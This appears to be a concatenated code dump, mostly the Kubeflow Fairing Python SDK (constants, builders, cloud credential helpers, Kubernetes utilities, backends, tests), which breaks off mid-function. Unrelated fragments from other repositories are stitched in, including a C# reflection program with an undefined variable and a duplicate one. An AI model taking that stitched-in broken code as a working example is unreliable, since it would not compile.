}<file_sep>/grails-app/i18n/variable.messages.properties
x0.password={0} Password<file_sep>/gradle.properties
grailsVersion=3.3.8
gormVersion=6.1.10.BUILD-SNAPSHOT
gradleWrapperVersion=2.9
<file_sep>/grails-app/assets/admin/js/sm-trading-erp/tab.dashboard.js
// APP.addTab({name: "Dashboard", url:"/admin/dashboard"})
// APP.initializeTabs()
|
2c76df6a47d5c12566ca2fca843a542b5c533ab4
|
[
"JavaScript",
"INI",
"Gradle"
] | 10
|
JavaScript
|
mainul35/sm-trading-erp
|
16b41a694fd66b9e620643ad756e40738dbb088d
|
27ee4a51714368c963602f4b40e270359877d5e1
|
refs/heads/master
|
<repo_name>MaximkaStar/reflection<file_sep>/Reflection/Man.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Reflection
{
public class Man
{
public string Age { get; set; }
public string Name { get; set; }
public string Surname { get; set; }
public bool Busy { get; set; }
}
}
<file_sep>/Reflection/Program.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Reflection
{
class Program
{
static void Main(string[] args)
{
FirstTarget();
SecondTarget();
}
private static void FirstTarget()
{
Type style = typeof(Console);
var mode = style.GetMethods();
foreach(var mode in methods)
{
Console.WriteLine("Title of mode: {0}", mode.Name);
Console.WriteLine("Reasons: ");
foreach(var reson in mode.GetParameters())
{
Console.WriteLine(reson.ParameterType + " _ " + reson.Name);
}
Console.WriteLine();
}
Console.ReadLine();
Console.Clear();
}
private static void SecondTarget()
{
Man man = new Man()
{
Name = "Aiden",
Surname = "Pearce",
Age = "29",
Busy = false
};
Type style = typeof(Man);
var internals = style.GetProperties();
for(int j = 0; j < internals.Length; j++)
{
switch(internals[j].Name)
{
case "Age":
int years = (int)internals[j].GetValue(man);
Console.WriteLine("Age: ", years);
break;
case "Surname":
string surname = (string)internals[j].GetValue(man);
Console.WriteLine("Surname: ", surname);
break;
case "Name":
string name = (string)internals[j].GetValue(man);
Console.WriteLine("Name: ", name);
break;
case "Busy":
bool busy = (bool)internals[j].GetValue(man);
Console.WriteLine("Busy(yes/no): ", busy);
break;
}
}
Console.ReadLine();
Console.Clear();
}
}
}
|
7261cc312a8b7d4cc95972bfa9a0cefb5229d5b2
|
[
"C#"
] | 2
|
C#
|
MaximkaStar/reflection
|
9b51bfac493863d26158353dcacc53758a53ef13
|
b8f049c912447ff3be38c43cb3dc886f4e669eb2
|
refs/heads/master
|
<repo_name>Bzour97/gallery-of-horns<file_sep>/README.md
# Class - 02:
## Number and name of feature: Feature #1: Display images
Estimate of time needed to complete: 60 Minutes
Start time: 1:00
Finish time: 2:15
Actual time needed to complete: One hour & 15 Minutes
----------------------------------------------------------------------------------
## Number and name of feature: Feature #2: Allow users to vote for their favorite beast
Estimate of time needed to complete: 45 Minutes
Start time: 2:15
Finish time: 3:05
Actual time needed to complete : 50 Minutes
----------------------------------------------------------------------------------
## Number and name of feature: Feature 3: Bootstrap
Estimate of time needed to complete: 60 Minutes
Start time: 3:30
Finish time: 4:45
Actual time needed to complete: One hour & 15 Minutes<file_sep>/src/components/HornedBeasts.js
import React from 'react';
import Card from 'react-bootstrap/Card'
import Row from 'react-bootstrap/Card'
import Col from 'react-bootstrap/Card'
class HornedBeasts extends React.Component {
constructor(props) {
super(props);
this.favorites = '💓';
this.state = { timeOfClick: 0 };
}
Click = (event) => {
event.preventDefault()
this.setState({ timeOfClick: this.state.timeOfClick + 1 });
this.props.handleDisplay();
this.props.filterBeast(this.props.image_url);
console.log(this.props.image_url)
}
render() {
return (
<div>
<Row xs={1} md={2} className = "test">
{Array.from({ length: 1 }).map((_, idx) => (
<Col>
<Card>
<Card.Img variant="Top" src={this.props.image_url} onClick={this.Click} width = '250'/>
<Card.Body>
<Card.Title>{this.props.title}</Card.Title>
<Card.Text>
{this.props.description} {this.state.timeOfClick} {this.favorites}
</Card.Text>
</Card.Body>
</Card>
</Col>
))}
</Row>
</div>
)
}
}
export default HornedBeasts;
|
2260d4bd62691b892a98f21d2a5c092bc79b94fe
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
Bzour97/gallery-of-horns
|
560a20a998f991c38828e8bb6dd5d7815aba2532
|
e219548064f0d7ad6efbb717e712cce3721175dc
|
refs/heads/master
|
<repo_name>wyw64962771/fairing<file_sep>/kubeflow/fairing/constants/constants.py
import os
TEMP_TAR_GZ_FILENAME = '/tmp/fairing.layer.tar.gz'
DEFAULT_IMAGE_NAME = 'fairing-job'
DEFAULT_BASE_IMAGE = 'gcr.io/kubeflow-images-public/fairing:dev'
DEFAULT_REGISTRY = 'index.docker.io'
DEFAULT_DEST_PREFIX = '/app/'
DEFAULT_CONTEXT_FILENAME = '/tmp/fairing.context.tar.gz'
DEFAULT_GENERATED_DOCKERFILE_FILENAME = '/tmp/Dockerfile'
GOOGLE_CREDS_ENV = 'GOOGLE_APPLICATION_CREDENTIALS'
GCP_SERVICE_ACCOUNT_NAME = 'default-editor'
GCP_CREDS_SECRET_NAME = 'user-gcp-sa'
AWS_CREDS_SECRET_NAME = 'aws-secret'
DOCKER_CREDS_SECRET_NAME = "docker-secret"
# See https://github.com/kubeflow/website/issues/1033 for documentation about these secrets.
AZURE_CREDS_SECRET_NAME = 'azcreds'
AZURE_ACR_CREDS_SECRET_NAME = 'acrcreds'
# The secret containing credentials to access a specific storage account is dynamically generated
# by using Azure credentials to get those storage credentials.
AZURE_STORAGE_CREDS_SECRET_NAME_PREFIX = 'storage-credentials-'
AZURE_FILES_SHARED_FOLDER = 'fairing-builds'
DEFAULT_USER_AGENT = 'kubeflow-fairing/{VERSION}'
# Job Constants
JOB_DEFAULT_NAME = 'fairing-job-'
JOB_DEPLOPYER_TYPE = 'job'
# Serving Constants
SERVING_DEPLOPYER_TYPE = 'serving'
#TFJob Constants
TF_JOB_VERSION = os.environ.get('TF_JOB_VERSION', 'v1beta2')
TF_JOB_GROUP = "kubeflow.org"
TF_JOB_KIND = "TFJob"
TF_JOB_PLURAL = "tfjobs"
TF_JOB_DEFAULT_NAME = 'fairing-tfjob-'
TF_JOB_DEPLOYER_TYPE = 'tfjob'
# KFServing constants
KFSERVING_GROUP = "serving.kubeflow.org"
KFSERVING_KIND = "KFService"
KFSERVING_PLURAL = "kfservices"
KFSERVING_VERSION = "v1alpha1"
KFSERVING_DEFAULT_NAME = 'fairing-kfserving-'
KFSERVING_DEPLOYER_TYPE = 'kfservice'
KFSERVING_CONTAINER_NAME = 'user-container'
# persistent volume claim constants
PVC_DEFAULT_MOUNT_PATH = '/mnt'
PVC_DEFAULT_VOLUME_NAME = 'fairing-volume-'
# Kaniko Constants
KANIKO_IMAGE = 'gcr.io/kaniko-project/executor:v0.7.0'
<file_sep>/tests/unit/config_test.py
"""Tests for Fairing configuration options."""
from kubeflow.fairing import config as config
from kubeflow.fairing.preprocessors.base import BasePreProcessor
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessor
from kubeflow.fairing.builders.append.append import AppendBuilder
from kubeflow.fairing.builders.docker.docker import DockerBuilder
def test_set_preprocessor():
"""Assert that a custom preprocessor can be provided."""
config.reset()
config.set_preprocessor('notebook')
assert isinstance(config.get_preprocessor(), ConvertNotebookPreprocessor)
def test_get_preprocessor_with_default():
"""
Assert that getting the preprocessor without setting it returns the default
preprocessor.
"""
config.reset()
assert isinstance(config.get_preprocessor(), BasePreProcessor)
def test_set_builder_default():
"""
Assert that the default builder is set when no explicit argument is
provided.
"""
config.reset()
config.set_builder(push=False)
assert isinstance(config.get_builder(
config.get_preprocessor()), AppendBuilder)
def test_set_builder():
"""Assert that a custom builder can be provided."""
config.reset()
config.set_builder('docker', push=False)
assert isinstance(config.get_builder(
config.get_preprocessor()), DockerBuilder)
<file_sep>/tests/integration/common/test_kubeflow_training.py
import sys
import time
import uuid
from kubernetes import client
from kubeflow import fairing
from kubeflow.fairing.builders.cluster import gcs_context
from kubeflow.fairing.constants import constants
GCS_PROJECT_ID = fairing.cloud.gcp.guess_project_name()
DOCKER_REGISTRY = 'gcr.io/{}'.format(GCS_PROJECT_ID)
# Dummy training function to be submitted
def train_fn(msg):
for _ in range(30):
time.sleep(0.1)
print(msg)
# Update module to work with function preprocessor
# TODO: Remove when the function preprocessor works with functions from
# other modules.
train_fn.__module__ = '__main__'
def get_tfjobs_with_labels(labels):
api_instance = client.CustomObjectsApi()
return api_instance.list_cluster_custom_object(
constants.TF_JOB_GROUP,
constants.TF_JOB_VERSION,
constants.TF_JOB_PLURAL,
label_selector=labels)
def run_submission_with_function_preprocessor(capsys, deployer="job", builder="append",
namespace="default", cleanup=False):
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(py_version)
if builder == 'cluster':
fairing.config.set_builder(builder, base_image=base_image, registry=DOCKER_REGISTRY,
pod_spec_mutators=[
fairing.cloud.gcp.add_gcp_credentials],
context_source=gcs_context.GCSContextSource(
namespace=namespace),
namespace=namespace)
else:
fairing.config.set_builder(
builder, base_image=base_image, registry=DOCKER_REGISTRY)
expected_result = str(uuid.uuid4())
fairing.config.set_deployer(deployer, namespace=namespace, cleanup=cleanup,
labels={'pytest-id': expected_result})
remote_train = fairing.config.fn(lambda: train_fn(expected_result))
remote_train()
captured = capsys.readouterr()
assert expected_result in captured.out
if deployer == "tfjob":
if cleanup:
assert expected_result not in str(
get_tfjobs_with_labels('pytest-id=' + expected_result))
else:
assert expected_result in str(
get_tfjobs_with_labels('pytest-id=' + expected_result))
def test_job_deployer(capsys):
run_submission_with_function_preprocessor(capsys, deployer="job")
def test_tfjob_deployer(capsys):
run_submission_with_function_preprocessor(
capsys, deployer="tfjob", namespace="kubeflow")
def test_tfjob_deployer_cleanup(capsys):
run_submission_with_function_preprocessor(capsys, deployer="tfjob",
namespace="kubeflow", cleanup=True)
def test_docker_builder(capsys):
run_submission_with_function_preprocessor(capsys, builder="docker")
def test_cluster_builder(capsys):
run_submission_with_function_preprocessor(
capsys, builder="cluster", namespace="kubeflow")
<file_sep>/kubeflow/fairing/builders/cluster/cluster.py
import logging
import uuid
from kubernetes import client
from kubeflow.fairing import utils
from kubeflow.fairing.builders.base_builder import BaseBuilder
from kubeflow.fairing.builders import dockerfile
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
class ClusterBuilder(BaseBuilder):
"""Builds a docker image in a Kubernetes cluster.
Args:
registry (str): Required. Registry to push image to
Example: gcr.io/kubeflow-images
base_image (str): Base image to use for the image build
preprocessor (BasePreProcessor): Preprocessor to use to modify inputs
before sending them to docker build
context_source (ContextSourceInterface): context available to the
cluster build
push {bool} -- Whether or not to push the image to the registry
cleanup {bool} -- Whether or not to clean up the Kaniko build job
"""
def __init__(self,
registry=None,
image_name=constants.DEFAULT_IMAGE_NAME,
context_source=None,
preprocessor=None,
push=True,
base_image=constants.DEFAULT_BASE_IMAGE,
pod_spec_mutators=None,
namespace=None,
dockerfile_path=None,
cleanup=False):
super().__init__(
registry=registry,
image_name=image_name,
push=push,
preprocessor=preprocessor,
base_image=base_image)
self.manager = KubeManager()
if context_source is None:
raise RuntimeError("context_source is not specified")
self.context_source = context_source
self.pod_spec_mutators = pod_spec_mutators or []
self.namespace = namespace or utils.get_default_target_namespace()
self.cleanup = cleanup
def build(self):
logging.info("Building image using cluster builder.")
install_reqs_before_copy = self.preprocessor.is_requirements_txt_file_present()
dockerfile_path = dockerfile.write_dockerfile(
dockerfile_path=self.dockerfile_path,
path_prefix=self.preprocessor.path_prefix,
base_image=self.base_image,
install_reqs_before_copy=install_reqs_before_copy
)
self.preprocessor.output_map[dockerfile_path] = 'Dockerfile'
context_path, context_hash = self.preprocessor.context_tar_gz()
self.image_tag = self.full_image_name(context_hash)
self.context_source.prepare(context_path)
labels = {'fairing-builder': 'kaniko'}
labels['fairing-build-id'] = str(uuid.uuid1())
pod_spec = self.context_source.generate_pod_spec(
self.image_tag, self.push)
for fn in self.pod_spec_mutators:
fn(self.manager, pod_spec, self.namespace)
pod_spec_template = client.V1PodTemplateSpec(
metadata=client.V1ObjectMeta(
generate_name="fairing-builder-",
labels=labels,
namespace=self.namespace,
annotations={"sidecar.istio.io/inject": "false"},
),
spec=pod_spec
)
job_spec = client.V1JobSpec(
template=pod_spec_template,
parallelism=1,
completions=1,
backoff_limit=0,
)
build_job = client.V1Job(
api_version="batch/v1",
kind="Job",
metadata=client.V1ObjectMeta(
generate_name="fairing-builder-",
labels=labels,
),
spec=job_spec
)
created_job = client. \
BatchV1Api(). \
create_namespaced_job(self.namespace, build_job)
self.manager.log(
name=created_job.metadata.name,
namespace=created_job.metadata.namespace,
selectors=labels,
container="kaniko")
# Invoke upstream clean ups
self.context_source.cleanup()
# Cleanup build_job if requested by user
# Otherwise build_job will be cleaned up by Kubernetes GC
if self.cleanup:
logging.warning("Cleaning up job {}...".format(created_job.metadata.name))
client. \
BatchV1Api(). \
delete_namespaced_job(
created_job.metadata.name,
created_job.metadata.namespace,
body=client.V1DeleteOptions(propagation_policy='Foreground')
)
<file_sep>/kubeflow/fairing/cloud/docker.py
import logging
from kubernetes import client
from docker.utils.config import find_config_file
from base64 import b64encode
from kubeflow.fairing.constants import constants
logger = logging.getLogger(__name__)
def get_docker_secret():
try:
docker_config_file = find_config_file(config_path=None)
with open(docker_config_file, 'r') as f:
data = f.read()
data = {".dockerconfigjson": b64encode(
data.encode('utf-8')).decode("utf-8")}
docker_secret = client.V1Secret(
metadata=client.V1ObjectMeta(name=constants.DOCKER_CREDS_SECRET_NAME),
data=data,
kind="Secret",
type="kubernetes.io/dockerconfigjson"
)
return docker_secret
except Exception as e:
logger.warning("could not get docker secret: {}".format(e))
return None
def create_docker_secret(kube_manager, namespace):
try:
docker_secret = get_docker_secret()
if docker_secret:
kube_manager.create_secret(namespace, docker_secret)
except Exception as e:
logger.warning("could not create docker secret: {}".format(e))
def add_docker_credentials_if_exists(kube_manager, pod_spec, namespace):
secret_name = constants.DOCKER_CREDS_SECRET_NAME
try:
if not kube_manager.secret_exists(secret_name, namespace):
create_docker_secret(kube_manager, namespace)
if kube_manager.secret_exists(secret_name, namespace):
add_docker_credentials(kube_manager, pod_spec, namespace)
else:
logger.warning("Not able to find docker credentials secret: {}".format(secret_name))
except Exception as e:
logger.warning("could not check for secret: {}".format(e))
def add_docker_credentials(kube_manager, pod_spec, namespace):
secret_name = constants.DOCKER_CREDS_SECRET_NAME
if not kube_manager.secret_exists(secret_name, namespace):
raise ValueError("Not able to find docker credentials secret: {}".format(secret_name))
pod_spec.image_pull_secrets = [client.V1LocalObjectReference(secret_name)]
<file_sep>/examples/prediction/requirements.txt
pandas
joblib
numpy
xgboost
scikit-learn>=0.21.0
seldon-core
tornado>=6.0.3
<file_sep>/setup.py
import setuptools
with open('requirements.txt') as f:
REQUIRES = f.read().splitlines()
setuptools.setup(
name='kubeflow-fairing',
version='0.6.0',
author="<NAME>",
author_email='<EMAIL>',
license="Apache License Version 2.0",
description="Kubeflow Fairing Python SDK.",
long_description="Python SDK for Kubeflow Fairing components.",
url="https://github.com/kubeflow/fairing",
packages=setuptools.find_packages(
include=("kubeflow*", "containerregistry*",)),
package_data={},
include_package_data=False,
zip_safe=False,
classifiers=(
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
),
install_requires=REQUIRES,
extras_require={
'dev': [
'pytest',
'pytest-pep8',
'pytest-cov'
]
}
)
<file_sep>/kubeflow/fairing/kubernetes/utils.py
from kubernetes import client
from kubernetes.client.models.v1_resource_requirements import V1ResourceRequirements
from kubeflow.fairing.constants import constants
def get_resource_mutator(cpu=None, memory=None):
"""The mutator for getting the resource setting for pod spec.
The useful example:
https://github.com/kubeflow/fairing/blob/master/examples/train_job_api/main.ipynb
:param cpu: Limits and requests for CPU resources (Default value = None)
:param memory: Limits and requests for memory (Default value = None)
:returns: object: The mutator function for setting cpu and memory in pod spec.
"""
def _resource_mutator(kube_manager, pod_spec, namespace): #pylint:disable=unused-argument
if cpu is None and memory is None:
return
if pod_spec.containers and len(pod_spec.containers) >= 1:
# All cloud providers specify their instace memory in GB
# so it is peferable for user to specify memory in GB
# and we convert it to Gi that K8s needs
limits = {}
if cpu:
limits['cpu'] = cpu
if memory:
memory_gib = "{}Gi".format(round(memory/1.073741824, 2))
limits['memory'] = memory_gib
if pod_spec.containers[0].resources:
if pod_spec.containers[0].resources.limits:
pod_spec.containers[0].resources.limits = {}
for k, v in limits.items():
pod_spec.containers[0].resources.limits[k] = v
else:
pod_spec.containers[0].resources = V1ResourceRequirements(limits=limits)
return _resource_mutator
def mounting_pvc(pvc_name, pvc_mount_path=constants.PVC_DEFAULT_MOUNT_PATH):
"""The function for pod_spec_mutators to mount persistent volume claim.
:param pvc_name: The name of persistent volume claim
:param pvc_mount_path: Path for the persistent volume claim mounts to.
:returns: object: function for mount the pvc to pods.
"""
mounting_name = str(constants.PVC_DEFAULT_VOLUME_NAME) + pvc_name
def _mounting_pvc(kube_manager, pod_spec, namespace): #pylint:disable=unused-argument
volume_mount = client.V1VolumeMount(
name=mounting_name, mount_path=pvc_mount_path)
if pod_spec.containers[0].volume_mounts:
pod_spec.containers[0].volume_mounts.append(volume_mount)
else:
pod_spec.containers[0].volume_mounts = [volume_mount]
volume = client.V1Volume(
name=mounting_name,
persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(claim_name=pvc_name))
if pod_spec.volumes:
pod_spec.volumes.append(volume)
else:
pod_spec.volumes = [volume]
return _mounting_pvc
<file_sep>/tests/unit/preprocessors/test_converted_notebook_preprocessor.py
import tarfile
import os
import posixpath
from pathlib import Path
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessor
from kubeflow.fairing.preprocessors.converted_notebook import ConvertNotebookPreprocessorWithFire
from kubeflow.fairing.preprocessors.converted_notebook import FilterIncludeCell
from kubeflow.fairing.constants.constants import DEFAULT_DEST_PREFIX
NOTEBOOK_PATH = os.path.relpath(
os.path.join(os.path.dirname(__file__), 'test_notebook.ipynb'))
CONVERTED_NOTEBOOK_PATH = NOTEBOOK_PATH.replace(".ipynb", ".py")
def test_preprocess():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
files = preprocessor.preprocess()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
os.remove(converted_notebook_path)
assert Path(converted_notebook_path) in files
def test_overwrite_file_for_multiple_runs():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
files = preprocessor.preprocess()
files_overwrite = preprocessor.preprocess()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
os.remove(converted_notebook_path)
assert files == files_overwrite
def test_get_command():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
preprocessor.preprocess()
command = preprocessor.get_command()
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
conv_notebook_context_path = posixpath.join(
DEFAULT_DEST_PREFIX, converted_notebook_path)
expected_command = 'python {}'.format(conv_notebook_context_path)
os.remove(converted_notebook_path)
assert command == expected_command.split()
def test_context_tar_gz():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
os.remove(converted_notebook_path)
assert "print('Hello World')" in tar_notebook.read().decode()
def test_filter_include_cell():
preprocessor = ConvertNotebookPreprocessor(notebook_file=NOTEBOOK_PATH,
notebook_preprocessor=FilterIncludeCell)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
tar_notebook_text = tar_notebook.read().decode()
os.remove(converted_notebook_path)
assert "print('This cell includes fairing:include-cell')" in tar_notebook_text
def test_context_tar_gz_with_fire():
preprocessor = ConvertNotebookPreprocessorWithFire(
notebook_file=NOTEBOOK_PATH)
context_file, _ = preprocessor.context_tar_gz()
tar = tarfile.open(context_file)
relative_path_prefix = posixpath.relpath(DEFAULT_DEST_PREFIX, "/")
converted_notebook_path = posixpath.join(os.path.dirname(
NOTEBOOK_PATH), os.path.basename(preprocessor.executable))
notebook_context_path = posixpath.join(
relative_path_prefix, converted_notebook_path)
tar_notebook = tar.extractfile(tar.getmember(notebook_context_path))
tar_notebook_text = tar_notebook.read().decode()
os.remove(converted_notebook_path)
assert "fire.Fire(None)" in tar_notebook_text
<file_sep>/kubeflow/fairing/backends/backends.py
import abc
import six
import sys
import logging
from kubeflow.fairing import utils
from kubeflow.fairing.builders.docker.docker import DockerBuilder
from kubeflow.fairing.builders.cluster import gcs_context
from kubeflow.fairing.builders.cluster.cluster import ClusterBuilder
from kubeflow.fairing.builders.cluster import s3_context
from kubeflow.fairing.builders.cluster import azurestorage_context
from kubeflow.fairing.builders.append.append import AppendBuilder
from kubeflow.fairing.deployers.gcp.gcp import GCPJob
from kubeflow.fairing.deployers.job.job import Job
from kubeflow.fairing.deployers.serving.serving import Serving
from kubeflow.fairing.cloud import aws
from kubeflow.fairing.cloud import azure
from kubeflow.fairing.cloud import gcp
from kubeflow.fairing.cloud import docker
from kubeflow.fairing.ml_tasks import utils as ml_tasks_utils
from kubeflow.fairing.constants import constants
from kubeflow.fairing.kubernetes.manager import KubeManager
logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class BackendInterface(object):
""" Backend interface.
Creating a builder instance or a deployer to be used with a traing job or a serving job
for the given backend.
And get the approriate base container or docker registry for the current environment.
"""
@abc.abstractmethod
def get_builder(self, preprocessor, base_image, registry):
"""Creates a builder instance with right config for the given backend
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this builder
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_builder')
@abc.abstractmethod
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value = None)
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_training_deployer')
@abc.abstractmethod
def get_serving_deployer(self, model_class):
"""Creates a deployer to be used with a serving job
:param model_class: the name of the class that holds the predict function.
:raises NotImplementedError: not implemented exception
"""
raise NotImplementedError('BackendInterface.get_serving_deployer')
def get_base_contanier(self):
"""Returns the approriate base container for the current environment
:returns: base image
"""
py_version = ".".join([str(x) for x in sys.version_info[0:3]])
base_image = 'registry.hub.docker.com/library/python:{}'.format(
py_version)
return base_image
def get_docker_registry(self):
"""Returns the approriate docker registry for the current environment
:returns: None
"""
return None
class KubernetesBackend(BackendInterface):
""" Use to create a builder instance and create a deployer to be used with a traing job or
a serving job for the Kubernetes.
"""
def __init__(self, namespace=None, build_context_source=None):
if not namespace and not utils.is_running_in_k8s():
logger.warning("Can't determine namespace automatically. "
"Using 'default' namespace but recomend to provide namespace explicitly"
". Using 'default' namespace might result in unable to mount some "
"required secrets in cloud backends.")
self._namespace = namespace or utils.get_default_target_namespace()
self._build_context_source = build_context_source
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True, # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a builder instance with right config for the given Kubernetes
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif utils.is_running_in_k8s():
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
namespace=self._namespace,
context_source=self._build_context_source)
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
# TODO (karthikv2k): Add more info on how to reolve this issue
raise RuntimeError(
"Not able to guess the right builder for this job!")
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for the Kubernetes
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
return Job(self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP', # pylint:disable=arguments-differ
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for the Kubernetes
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
class GKEBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the GKE backend.
And get the approriate docker registry for GKE.
"""
def __init__(self, namespace=None, build_context_source=None):
super(GKEBackend, self).__init__(namespace, build_context_source)
self._build_context_source = gcs_context.GCSContextSource(
namespace=self._namespace)
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True,
pod_spec_mutators=None):
"""Creates a builder instance with right config for GKE
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
if not needs_deps_installation:
return AppendBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
elif (utils.is_running_in_k8s() or
not ml_tasks_utils.is_docker_daemon_exists()):
return ClusterBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry,
pod_spec_mutators=pod_spec_mutators,
namespace=self._namespace,
context_source=self._build_context_source)
elif ml_tasks_utils.is_docker_daemon_exists():
return DockerBuilder(preprocessor=preprocessor,
base_image=base_image,
registry=registry)
else:
msg = ["Not able to guess the right builder for this job!"]
if KubeManager().secret_exists(constants.GCP_CREDS_SECRET_NAME, self._namespace):
msg.append("It seems you don't have permission to list/access secrets in your "
"Kubeflow cluster. We need this permission in order to build a docker "
"image using Kubeflow cluster. Adding Kubeneters Admin role to the "
"service account you are using might solve this issue.")
if not utils.is_running_in_k8s():
msg.append(" Also If you are using 'sudo' to access docker in your system you can"
" solve this problem by adding your username to the docker group. "
"Reference: https://docs.docker.com/install/linux/linux-postinstall/"
"#manage-docker-as-a-non-root-user You need to logout and login to "
"get change activated.")
message = " ".join(msg)
raise RuntimeError(message)
def get_training_deployer(self, pod_spec_mutators=None):
"""Creates a deployer to be used with a training job for GKE
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
:returns: job for handle all the k8s' template building for a training
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(gcp.add_gcp_credentials_if_exists)
return Job(namespace=self._namespace, pod_spec_mutators=pod_spec_mutators)
def get_serving_deployer(self, model_class, service_type='ClusterIP',
pod_spec_mutators=None):
"""Creates a deployer to be used with a serving job for GKE
:param model_class: the name of the class that holds the predict function.
:param service_type: service type (Default value = 'ClusterIP')
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
(Default value = None)
"""
return Serving(model_class, namespace=self._namespace, service_type=service_type,
pod_spec_mutators=pod_spec_mutators)
def get_docker_registry(self):
"""Returns the approriate docker registry for GKE
:returns: docker registry
"""
return gcp.get_default_docker_registry()
class AWSBackend(KubernetesBackend):
""" Use to create a builder instance and create a deployer to be used with a traing job
or a serving job for the AWS backend.
"""
def __init__(self, namespace=None, build_context_source=None):
build_context_source = build_context_source or s3_context.S3ContextSource()
super(AWSBackend, self).__init__(namespace, build_context_source)
def get_builder(self, preprocessor, base_image, registry, needs_deps_installation=True,
pod_spec_mutators=None):
"""Creates a builder instance with right config for AWS
:param preprocessor: Preprocessor to use to modify inputs
:param base_image: Base image to use for this job
:param registry: Registry to push image to. Example: gcr.io/kubeflow-images
:param needs_deps_installation: need depends on installation(Default value = True)
:param pod_spec_mutators: list of functions that is used to mutate the podsspec.
e.g. fairing.cloud.gcp.add_gcp_credentials_if_exists
This can used to set things like volumes and security context.
(Default value =None)
"""
pod_spec_mutators = pod_spec_mutators or []
pod_spec_mutators.append(aws.add_aws_credentials_if_exists)
if aws.is_ecr_registry(registry):
